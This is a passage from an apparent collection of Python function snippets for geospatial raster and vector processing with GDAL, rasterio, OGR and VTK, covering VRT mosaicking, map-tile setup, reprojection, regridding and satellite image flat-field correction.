Path(outdir)\n\n # loop over each day directory\n for day in indir.iterdir():\n # expecting 20 subdatasets in each hdf4 file (hopefully the order gdal lists them in is consistent)\n subdataset_fnames = {i: [] for i in range(20)}\n\n # mosaic each MODIS tile for the current day directory\n for h4_fname in day.rglob('*.hdf'):\n with rasterio.open(str(h4_fname.absolute())) as h4_ds:\n\n # each subdataset will form a separate mosaic\n for i, sds_name in enumerate(h4_ds.subdatasets):\n subdataset_fnames[i].append(sds_name)\n\n # loop over each subdataset and mosaic from all supporting MODIS tiles\n for _, file_list in subdataset_fnames.items():\n\n # temp file for the input file list\n with tempfile.NamedTemporaryFile('w') as tmpf:\n tmpf.writelines(\"\\n\".join(file_list))\n tmpf.flush()\n\n # mimic the 'day' directory partition\n base_name = Path(file_list[0].replace(':', '/')).name\n out_fname = outdir.joinpath(day.name, '{}.vrt'.format(base_name))\n\n if not out_fname.parent.exists():\n out_fname.parent.mkdir(parents=True)\n\n # buildvrt\n cmd = [\n 'gdalbuildvrt',\n '-input_file_list',\n tmpf.name,\n str(out_fname)\n ]\n\n check_call(cmd)", "def merge(files: List[str], output_file: str, resample: str = \"average\") -> None:\n\n build_vrt(constants.TEMP_VRT_FILE, files, resample)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', 'YES')\n\n gdal.Translate(destName=output_file, srcDS=constants.TEMP_VRT_FILE)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', None)\n\n if os.path.isfile(constants.TEMP_VRT_FILE):\n os.remove(constants.TEMP_VRT_FILE)", "def open_input(self):\n gdal.SetConfigOption(\"GDAL_PAM_ENABLED\", \"YES\")\n gdal.AllRegister()\n # self.options.verbose=True\n if self.options.tms_osm:\n self.s_y_type=\"osm\"\n else:\n self.s_y_type=\"tms\"\n if self.options.verbose:\n print \"open_input :\", self.input,\" osm[\",self.options.tms_osm,\",\",self.s_y_type,\"] mbtiles[\",self.options.mbtiles,\"] mbtiles_todisk[\",self.options.mbtiles_todisk,\"] mbtiles_fromdisk[\",self.options.mbtiles_fromdisk,\"]\";\n # Open the input file\n if self.input:\n self.in_ds = gdal.Open(self.input, gdal.GA_ReadOnly)\n else:\n raise Exception(\"No input file was specified\")\n\n if self.options.verbose:\n print \"Input file:\", \"( %sP x %sL - %s bands)\" % (self.in_ds.RasterXSize, self.in_ds.RasterYSize, self.in_ds.RasterCount)\n\n if not self.in_ds:\n # Note: GDAL prints the ERROR message too\n self.error(\"It is not possible to open the input file '%s'.\" % self.input )\n\n # Read metadata from the input file\n if self.in_ds.RasterCount == 0:\n self.error( \"Input file '%s' has no raster band\" % self.input )\n\n if self.in_ds.GetRasterBand(1).GetRasterColorTable():\n # TODO: Process directly paletted dataset by generating VRT in memory\n self.error( \"Please convert this file to RGB/RGBA and run gdal2mbtiles on the result.\",\n \"\"\"From paletted file you can create RGBA file (temp.vrt) by:\ngdal_translate -of vrt -expand rgba %s temp.vrt\nthen run:\ngdal2mbtiles temp.vrt\"\"\" % self.input )\n\n # Get NODATA value\n # User supplied values overwrite everything else.\n if self.options.srcnodata is not None:\n nds = map(float, self.options.srcnodata.split(','))\n if len(nds) < self.in_ds.RasterCount:\n self.in_nodata = (nds * self.in_ds.RasterCount)[:self.in_ds.RasterCount]\n else:\n self.in_nodata = nds\n else:\n # If the source dataset has NODATA, use it.\n self.in_nodata = []\n for i in range(1, self.in_ds.RasterCount+1):\n if self.in_ds.GetRasterBand(i).GetNoDataValue() != None:\n self.in_nodata.append( self.in_ds.GetRasterBand(i).GetNoDataValue() )\n\n if self.options.verbose:\n print \"NODATA: %s\" % self.in_nodata\n\n # INIT DEST\n if self.options.init_dest is not None:\n if self.options.tile_format == \"jpeg\":\n if self.in_ds.RasterCount == 4:\n nbands = 3\n else:\n nbands = self.in_ds.RasterCount\n\n nds = map(float, self.options.init_dest.split(','))\n\n if len(nds) == 1:\n init_dest = nds * nbands\n elif len(nds) == nbands:\n init_dest = nds\n else:\n print \"WARNING: you suplied %d '--init-dest' values but the dataset has %d data bands\" % (len(nds), nbands)\n init_dest = None\n else:\n init_dest = None\n print \"WARNING: --init-dest can be used only with 'jpeg' tile format\"\n else:\n if self.options.tile_format == \"jpeg\":\n init_dest = [255,255,255]\n else:\n init_dest = None\n\n #\n # Here we should have RGBA input dataset opened in self.in_ds\n #\n\n if self.options.verbose:\n print \"Preprocessed file:\", \"( %sP x %sL - %s bands)\" % (self.in_ds.RasterXSize, self.in_ds.RasterYSize, self.in_ds.RasterCount)\n\n # Spatial Reference System of the input raster\n\n\n self.in_srs = None\n\n if self.options.s_srs:\n self.in_srs = osr.SpatialReference()\n self.in_srs.SetFromUserInput(self.options.s_srs)\n self.in_srs_wkt = self.in_srs.ExportToWkt()\n else:\n self.in_srs_wkt = self.in_ds.GetProjection()\n if not self.in_srs_wkt and self.in_ds.GetGCPCount() != 0:\n self.in_srs_wkt = self.in_ds.GetGCPProjection()\n if self.in_srs_wkt:\n self.in_srs = osr.SpatialReference()\n self.in_srs.ImportFromWkt(self.in_srs_wkt)\n #elif self.options.profile != 'raster':\n # self.error(\"There is no spatial reference system info included in the input file.\",\"You should run gdal2mbtiles with --s_srs EPSG:XXXX or similar.\")\n\n # Spatial Reference System of tiles\n\n self.out_srs = osr.SpatialReference()\n\n if self.options.profile == 'mercator':\n self.out_srs.ImportFromEPSG(900913)\n elif self.options.profile in ('geodetic', 'gearth', 'garmin'):\n self.out_srs.ImportFromEPSG(4326)\n else:\n self.out_srs = self.in_srs\n\n # Are the reference systems the same? Reproject if necessary.\n\n self.out_ds = None\n\n if self.options.profile in ('mercator', 'geodetic', 'gearth', 'garmin'):\n\n if (self.in_ds.GetGeoTransform() == (0.0, 1.0, 0.0, 0.0, 0.0, 1.0)) and (self.in_ds.GetGCPCount() == 0):\n self.error(\"There is no georeference - neither affine transformation (worldfile) nor GCPs. You can generate only 'raster' profile tiles.\",\n \"Either gdal2mbtiles with parameter -p 'raster' or use another GIS software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs\")\n\n if self.in_srs:\n\n if (self.in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or (self.in_ds.GetGCPCount() != 0):\n\n # Generation of VRT dataset in tile projection, default 'nearest neighbour' warping\n self.out_ds = gdal.AutoCreateWarpedVRT( self.in_ds, self.in_srs_wkt, self.out_srs.ExportToWkt() )\n\n # TODO: HIGH PRIORITY: Correction of AutoCreateWarpedVRT according the max zoomlevel for correct direct warping!!!\n\n if self.options.verbose:\n print \"Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')\"\n self.out_ds.GetDriver().CreateCopy(\"tiles.vrt\", self.out_ds)\n\n # Note: self.in_srs and self.in_srs_wkt contain still the non-warped reference system!!!\n\n # Correction of AutoCreateWarpedVRT for NODATA values\n if self.in_nodata != []:\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"<GDALWarpOptions>\"\"\",\"\"\"<GDALWarpOptions>\n <Option name=\"UNIFIED_SRC_NODATA\">YES</Option>\n <Option name=\"INIT_DEST\">NO_DATA</Option>\"\"\")\n # replace BandMapping tag for NODATA bands....\n if init_dest is None:\n dstnodata = self.in_nodata\n else:\n dstnodata = init_dest\n for i in range(len(self.in_nodata)):\n s = s.replace(\"\"\"<BandMapping src=\"%i\" dst=\"%i\"/>\"\"\" % ((i+1),(i+1)),\"\"\"<BandMapping src=\"%i\" dst=\"%i\">\n <SrcNoDataReal>%i</SrcNoDataReal>\n <SrcNoDataImag>0</SrcNoDataImag>\n <DstNoDataReal>%i</DstNoDataReal>\n <DstNoDataImag>0</DstNoDataImag>\n </BandMapping>\"\"\" % ((i+1), (i+1), self.in_nodata[i], dstnodata[i]))\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n # set NODATA_VALUE metadata\n self.out_ds.SetMetadataItem('NODATA_VALUES','%s' % \" \".join(str(int(f)) for f in self.in_nodata))\n\n if self.options.verbose:\n print \"Modified warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n # -----------------------------------\n # Correction of AutoCreateWarpedVRT for Mono (1 band) and RGB (3 bands) files without NODATA:\n # equivalent of gdalwarp -dstalpha\n elif self.in_nodata == [] and self.out_ds.RasterCount in (1,3):\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"<BlockXSize>\"\"\",\"\"\"<VRTRasterBand dataType=\"Byte\" band=\"%i\" subClass=\"VRTWarpedRasterBand\">\n <ColorInterp>Alpha</ColorInterp>\n </VRTRasterBand>\n <BlockXSize>\"\"\" % (self.out_ds.RasterCount + 1))\n s = s.replace(\"\"\"</GDALWarpOptions>\"\"\", \"\"\"<DstAlphaBand>%i</DstAlphaBand>\n </GDALWarpOptions>\"\"\" % (self.out_ds.RasterCount + 1))\n if init_dest is None:\n init_dest_str = \"0\"\n else:\n init_dest_str = \",\".join(str(f) for f in init_dest)\n s = s.replace(\"\"\"</WorkingDataType>\"\"\", \"\"\"</WorkingDataType>\n <Option name=\"INIT_DEST\">%s</Option>\"\"\" % init_dest_str)\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n if self.options.verbose:\n print \"Modified -dstalpha warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n elif init_dest is not None:\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"</WorkingDataType>\"\"\", \"\"\"</WorkingDataType>\n <Option name=\"INIT_DEST\">%s</Option>\"\"\" % \",\".join(str(f) for f in init_dest))\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n if self.options.verbose:\n print \"Modified warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n # For raster with 4-bands: 4th unknown band set to alpha\n if (self.out_ds.RasterCount == 4\n and self.out_ds.GetRasterBand(4).GetRasterColorInterpretation() == gdal.GCI_Undefined):\n self.out_ds.GetRasterBand(4).SetRasterColorInterpretation(gdal.GCI_AlphaBand)\n\n s = '''\n '''\n\n else:\n self.error(\"Input file has unknown SRS.\", \"Use --s_srs ESPG:xyz (or similar) to provide source reference system.\" )\n\n if self.out_ds and self.options.verbose:\n print \"Projected file:\", \"tiles.vrt\", \"( %sP x %sL - %s bands)\" % (self.out_ds.RasterXSize, self.out_ds.RasterYSize, self.out_ds.RasterCount)\n\n if not self.out_ds:\n self.out_ds = self.in_ds\n\n #\n # Here we should have a raster (out_ds) in the correct Spatial Reference system\n #\n\n # KML test\n self.isepsg4326 = False\n srs4326 = osr.SpatialReference()\n srs4326.ImportFromEPSG(4326)\n if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():\n self.kml = True\n self.isepsg4326 = True\n if self.options.verbose:\n print \"KML autotest OK!\"\n\n # Read the georeference\n\n self.out_gt = self.out_ds.GetGeoTransform()\n\n #originX, originY = self.out_gt[0], self.out_gt[3]\n #pixelSize = self.out_gt[1] # = self.out_gt[5]\n\n # Test the size of the pixel\n\n # MAPTILER - COMMENTED\n #if self.out_gt[1] != (-1 * self.out_gt[5]) and self.options.profile != 'raster':\n # TODO: Process corectly coordinates with are have swichted Y axis (display in OpenLayers too)\n #self.error(\"Size of the pixel in the output differ for X and Y axes.\")\n\n # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)\n if (self.out_gt[2], self.out_gt[4]) != (0,0):\n self.error(\"Georeference of the raster contains rotation or skew. Such raster is not supported. Please use gdalwarp first.\")\n # TODO: Do the warping in this case automaticaly\n\n #\n # Here we expect: pixel is square, no rotation on the raster\n #\n\n # Output Bounds - coordinates in the output SRS\n self.ominx = self.out_gt[0]\n self.omaxx = self.out_gt[0]+self.out_ds.RasterXSize*self.out_gt[1]\n self.omaxy = self.out_gt[3]\n self.ominy = self.out_gt[3]-self.out_ds.RasterYSize*self.out_gt[1]\n # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15\n # user defined bounds to extract - coordinates in the output SRS\n if self.options.te_bounds != '':\n if self.te_minx >= self.ominx and self.te_minx <= self.omaxx:\n if self.te_maxx >= self.ominx and self.te_maxx <= self.omaxx:\n if self.te_miny >= self.ominy and self.te_miny <= self.omaxy:\n if self.te_maxy >= self.ominy and self.te_maxy <= self.omaxy:\n # replace only if inside the read bounds\n self.ominx = self.te_minx\n self.omaxx = self.te_maxx\n self.ominy = self.te_miny\n self.omaxy = self.te_maxy\n if self.options.verbose:\n print \"User defined Bounds (output srs) have been set:\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy\n\n if self.options.verbose:\n print \"Bounds (output srs):\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy\n\n if self.options.mbtiles:\n self.options.profile = 'mercator'\n if self.options.profile == 'mercator':\n self.mercator = GlobalMercator(self.options.tms_osm) # from globalmaptiles.py\n\n #\n # Calculating ranges for tiles in different zoom levels\n #\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.mercator.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0,32)\n for tz in range(0, 32):\n tminx, tminy = self.mercator.MetersToTile( self.ominx, self.ominy, tz )\n tmaxx, tmaxy = self.mercator.MetersToTile( self.omaxx, self.omaxy, tz )\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the minimal zoom level (map covers area equivalent to one tile)\n if self.tminz == None:\n self.tminz = self.mercator.ZoomForPixelSize( self.out_gt[1] * max( self.out_ds.RasterXSize, self.out_ds.RasterYSize) / float(self.tilesize) )\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tmaxz == None:\n self.tmaxz = self.mercator.ZoomForPixelSize( self.out_gt[1] )\n\n if self.options.verbose:\n print \"Bounds (latlong):\", self.mercator.MetersToLatLon( self.ominx, self.ominy), self.mercator.MetersToLatLon( self.omaxx, self.omaxy)\n print 'MinZoomLevel:', self.tminz\n print \"MaxZoomLevel:\", self.tmaxz, \"(\", self.mercator.Resolution( self.tmaxz ),\")\"\n\n # this must be call befor ImageOutput is called (self.output may be changed)\n if self.options.mbtiles:\n if not self.mbtiles_db:\n self.mbtiles_setup(1);\n\n # Instantiate image output.\n self.image_output = ImageOutput(self.options.tile_format, self.out_ds, self.tilesize,\n self.options.resampling, init_dest, self.output,\n self.options.verbose,self.options.mbtiles)\n if self.options.profile == 'geodetic':\n\n self.geodetic = GlobalGeodetic() # from globalmaptiles.py\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.geodetic.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0,32)\n for tz in range(0, 32):\n tminx, tminy = self.geodetic.LatLonToTile( self.ominx, self.ominy, tz )\n tmaxx, tmaxy = self.geodetic.LatLonToTile( self.omaxx, self.omaxy, tz )\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tminz == None:\n self.tminz = self.geodetic.ZoomForPixelSize( self.out_gt[1] * max( self.out_ds.RasterXSize, self.out_ds.RasterYSize) / float(self.tilesize) )\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tmaxz == None:\n self.tmaxz = self.geodetic.ZoomForPixelSize( self.out_gt[1] )\n\n if self.options.verbose:\n print \"Bounds (latlong):\", self.ominx, self.ominy, self.omaxx, self.omaxy\n\n if self.options.profile in ('raster', 'gearth', 'garmin'):\n\n log2 = lambda x: math.log10(x) / math.log10(2) # log2 (base 2 logarithm)\n\n self.nativezoom = int(max( math.ceil(log2(self.out_ds.RasterXSize/float(self.tilesize))),\n math.ceil(log2(self.out_ds.RasterYSize/float(self.tilesize)))))\n\n if self.options.verbose:\n print \"Native zoom of the raster:\", self.nativezoom\n\n # Get the minimal zoom level (whole raster in one tile)\n if self.tminz == None:\n self.tminz = 0\n\n # Get the maximal zoom level (native resolution of the raster)\n if self.tmaxz == None:\n self.tmaxz = self.nativezoom\n\n # Garmin has maximally 100 tiles - lower the tmaxz if necessary\n if self.options.profile == 'garmin':\n tno = math.ceil(self.out_ds.RasterXSize / self.tilesize) * math.ceil(self.out_ds.RasterYSize / self.tilesize)\n for tz in range(self.tmaxz, 1, -1):\n if tno > 100:\n tno /= 4\n self.tmaxz -= 1\n print \"Warning: GARMIN has a limit 100 tiles per device: lowering the max zoom level to:\", self.tmaxz\n else:\n continue\n\n # Force only one zoom level for the 'garmin' tile profile\n if self.options.profile == 'garmin':\n self.tminz = self.tmaxz\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0, self.tmaxz+1)\n self.tsize = range(0, self.tmaxz+1)\n for tz in range(0, self.tmaxz+1):\n tsize = 2.0**(self.nativezoom-tz)*self.tilesize\n tminx, tminy = 0, 0\n tmaxx = int(math.ceil( self.out_ds.RasterXSize / tsize )) - 1\n tmaxy = int(math.ceil( self.out_ds.RasterYSize / tsize )) - 1\n self.tsize[tz] = math.ceil(tsize)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # Function which generates SWNE in LatLong for given tile\n if self.kml and self.in_srs_wkt:\n self.ct = osr.CoordinateTransformation(self.in_srs, srs4326)\n def rastertileswne(x,y,z):\n pixelsizex = (2**(self.nativezoom-z) * self.out_gt[1]) # X-pixel size in level\n pixelsizey = (2**(self.nativezoom-z) * self.out_gt[5]) # Y-pixel size in level (usually -1*pixelsizex)\n west = self.out_gt[0] + x*self.tilesize*pixelsizex\n east = west + self.tilesize*pixelsizex\n south = self.ominy + y*self.tilesize*pixelsizex\n north = south + self.tilesize*pixelsizex\n if not self.isepsg4326:\n # Transformation to EPSG:4326 (WGS84 datum)\n west, south = self.ct.TransformPoint(west, south)[:2]\n east, north = self.ct.TransformPoint(east, north)[:2]\n return south, west, north, east\n\n self.tileswne = rastertileswne\n else:\n self.tileswne = lambda x, y, z: (0,0,0,0)", "def pipeline(inputfile, outputfile, functions, **kwargs):\n if not functions:\n raise ValueError('Must have at least one function')\n\n tmpfiles = []\n try:\n previous = inputfile\n for name, f in functions:\n logging.debug(name)\n vrt = f(previous)\n current = vrt.get_tempfile(suffix='.vrt', prefix='gdal')\n tmpfiles.append(current)\n previous = current.name\n logging.info('Rendering reprojected image')\n return vrt.render(outputfile=outputfile, **kwargs)\n finally:\n for f in tmpfiles:\n f.close()", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n print(type(vrt))\n # save the file as an enumerated tiff. reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n # print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # TODO - make the default configurable.\n# if src.crs == None:\n# src.crs = CRS.from_epsg(4326)\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n # print(type(vrt))\n # save the file as an enumerated tiff. reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def transform(infile, output, insrs, format_name):\n\n logging.info('Transforming %s from %s to %s' % (infile, insrs, output)) \n in_srs = osr.SpatialReference()\n in_srs.ImportFromEPSG(insrs)\n out_srs = osr.SpatialReference()\n out_srs.ImportFromEPSG(4324)\n coordTrans = osr.CoordinateTransformation(in_srs, out_srs)\n\n in_dsn = ogr.Open(infile)\n in_layer = in_dsn.GetLayer()\n in_feature_definition = in_layer.GetLayerDefn()\n\n out_driver = ogr.GetDriverByName(format_name)\n out_dsn = out_driver.CreateDataSource(output)\n out_layer = out_dsn.CreateLayer(in_layer.GetName(),\n geom_type=in_layer.GetGeomType())\n\n # add fields\n for i in range(0, in_feature_definition.GetFieldCount()):\n fieldDefn = in_feature_definition.GetFieldDefn(i)\n out_layer.CreateField(fieldDefn)\n\n # get the output layer's feature definition\n out_feature_definition = out_layer.GetLayerDefn()\n\n # loop through the input features\n inFeature = in_layer.GetNextFeature()\n while inFeature:\n # get the input geometry\n geom = inFeature.GetGeometryRef().Clone()\n # reproject the geometry\n geom.Transform(coordTrans)\n # create a new feature\n outFeature = ogr.Feature(out_feature_definition)\n # set the geometry and attribute\n outFeature.SetGeometry(geom)\n for i in range(0, out_feature_definition.GetFieldCount()):\n outFeature.SetField(out_feature_definition.GetFieldDefn(i).GetNameRef(), inFeature.GetField(i))\n # add the feature to the shapefile\n out_layer.CreateFeature(outFeature)\n # destroy the features and get the next input feature\n outFeature.Destroy()\n inFeature.Destroy()\n inFeature = in_layer.GetNextFeature()\n\n # close the shapefiles\n in_dsn.Destroy()\n out_dsn.Destroy()", "def vtp(self, f_vtu, f_vtp):\r\n reader = vtk.vtkXMLUnstructuredGridReader()\r\n reader.SetFileName(f_vtu)\r\n reader.Update()\r\n ugrid = reader.GetOutput()\r\n geometryFilter = vtk.vtkGeometryFilter()\r\n geometryFilter.SetInputData(ugrid)\r\n geometryFilter.Update()\r\n polydata = geometryFilter.GetOutput()\r\n writer =vtk.vtkXMLPolyDataWriter()\r\n writer.SetFileName(f_vtp)\r\n writer.SetInputData(polydata)\r\n writer.Write()\r\n print(\"vtp file created.\")", "def pan_corr(file):\n\n # # infile = 'd:\\\\Projekti\\\\Satelit\\\\CO\\\\Razpis\\\\Flat field images_new2020\\\\flatfield\\\\NHDBflat_1D'\n # # infile = 'd:\\Projekti\\Satelit\\CO\\Razpis\\_POSNETKI\\Jure_naloga_banje_raw_pyt\\\\NHDRGoreMorje_3D'\n #\n # # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\Flat field images_new2020\\\\20201028 Vignetting\\\\flatfield\\\\'\n # # in_pan_ref_file = 'NHDPflat_3D_py.tif'\n # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\_POSNETKI\\Peking_PAN\\\\'\n # in_pan_ref_file = 'NHDPfoc_swp6_1D_py.tif'\n # in_ref = in_path + in_pan_ref_file\n #\n # inreffil = gdal.Open(in_ref)\n # image_ref = inreffil.ReadAsArray()\n # # size_ref = image_ref.shape\n # # pix_count = size_ref[0]*size_ref[1]\n #\n # image_ref = image_ref[800:930, 1420:1640]\n # size_ref = image_ref.shape\n # pix_count = size_ref[0] * size_ref[1]\n #\n # g1 = 0.\n # g2 = 0.\n # r1 = 0.\n # b1 = 0.\n #\n # for i in range(size_ref[0]):\n # for j in range(size_ref[1]):\n # if (i % 2) == 0 and (j % 2) == 0: g1 = g1 + image_ref[i, j]\n # if (i % 2) == 1 and (j % 2) == 1: g2 = g2 + image_ref[i, j]\n # if (i % 2) == 0 and (j % 2) == 1: r1 = r1 + image_ref[i, j]\n # if (i % 2) == 1 and (j % 2) == 0: b1 = b1 + image_ref[i, j]\n #\n # g1_avg = g1 / pix_count * 4\n # g2_avg = g2 / pix_count * 4\n # r1_avg = r1 / pix_count * 4\n # b1_avg = b1 / pix_count * 4\n #\n # raz_g1 = 1\n # raz_g2 = g1_avg/g2_avg\n # raz_r1 = g1_avg/r1_avg\n # raz_b1 = g1_avg/b1_avg\n #\n # avg = (g1+g2+r1+b1)/pix_count\n #\n # print(g1_avg, g2_avg, r1_avg, b1_avg, avg)\n\n raz_g1 = 1\n raz_g2 = 1.0245196396115988\n raz_r1 = 1.0131841989689434\n raz_b1 = 1.0517113199247086\n\n print('razmerje:', raz_g1, raz_g2, raz_r1, raz_b1)\n\n # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\_POSNETKI\\Peking_PAN\\\\'\n # in_pan_ref_file = 'NHDPfoc_swp6_4D_py.tif'\n # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\Flat field images_new2020\\\\20201028 Vignetting\\\\flatfield\\\\'\n # in_pan_ref_file = 'NHDPflat_3D_py.tif'\n\n # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\_POSNETKI\\Slo_PAN\\_26_30\\\\'\n # in_pan_ref_file = [filename for filename in os.listdir(in_path) if filename.lower().startswith(\"nhd\") and filename.lower().endswith(\"tif\")]\n\n \n\n \n\n # print('image', i)\n in_ref=file\n inreffil = gdal.Open(in_ref)\n image_ref = inreffil.ReadAsArray()\n size_ref = image_ref.shape\n # pix_count = size_ref[0] * size_ref[1]\n # pix_count = np.count_nonzero(image_ref)\n # pix_count = 3664*650\n\n # g1 = 0.\n # g2 = 0.\n # r1 = 0.\n # b1 = 0.\n #\n # for i in range(size_ref[0]):\n # for j in range(size_ref[1]):\n # if (i % 2) == 0 and (j % 2) == 0: g1 = g1 + image_ref[i, j]\n # if (i % 2) == 1 and (j % 2) == 1: g2 = g2 + image_ref[i, j]\n # if (i % 2) == 0 and (j % 2) == 1: r1 = r1 + image_ref[i, j]\n # if (i % 2) == 1 and (j % 2) == 0: b1 = b1 + image_ref[i, j]\n #\n # g1_avg = g1 / pix_count * 4\n # g2_avg = g2 / pix_count * 4\n # r1_avg = r1 / pix_count * 4\n # b1_avg = b1 / pix_count * 4\n #\n # avg = (g1 + g2 + r1 + b1) / pix_count\n #\n # print(g1_avg, g2_avg, r1_avg, b1_avg, avg)\n\n # popravek\n im_p_pop = np.zeros((size_ref[0], size_ref[1]), np.uint16)\n\n\n for i in range(size_ref[0]):\n for j in range(size_ref[1]):\n if (i % 2) == 0 and (j % 2) == 0 and image_ref[i, j] != 0: im_p_pop[i, j] = image_ref[i, j] * raz_g1\n if (i % 2) == 1 and (j % 2) == 1 and image_ref[i, j] != 0: im_p_pop[i, j] = image_ref[i, j] * raz_g2\n if (i % 2) == 0 and (j % 2) == 1 and image_ref[i, j] != 0: im_p_pop[i, j] = image_ref[i, j] * raz_r1\n if (i % 2) == 1 and (j % 2) == 0 and image_ref[i, j] != 0: im_p_pop[i, j] = image_ref[i, j] * raz_b1\n \n _,_,_,_,P=return_flatfield_set_path(2)\n P_flat=gdal_array.LoadFile(P)\n \n # im_p_pop=simple_flatfield_corr(P_flat, im_p_pop, 2, 1) \n \n # outout\n \n im_p_pop=BLUE_simple_flatfield_corr(P_flat, im_p_pop)\n \n out=os.path.abspath(file)+\"/corr/\"+os.path.basename(file)[:-4] + \"_pop_flat_corr.tif\"\n\n \n # out = in_ref[:-4] + \"_pop_flat_corr.tif\"\n\n driver = gdal.GetDriverByName('GTiff')\n\n # outRaster = driver.Create(out, size[1], size[0], 3, gdal.GDT_UInt16)\n outRaster = driver.Create(out, size_ref[1], size_ref[0], 1, gdal.GDT_UInt16)\n\n outband = outRaster.GetRasterBand(1)\n outband.WriteArray(im_p_pop)\n outband.FlushCache()", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def main(file):\n\n # Get the current working 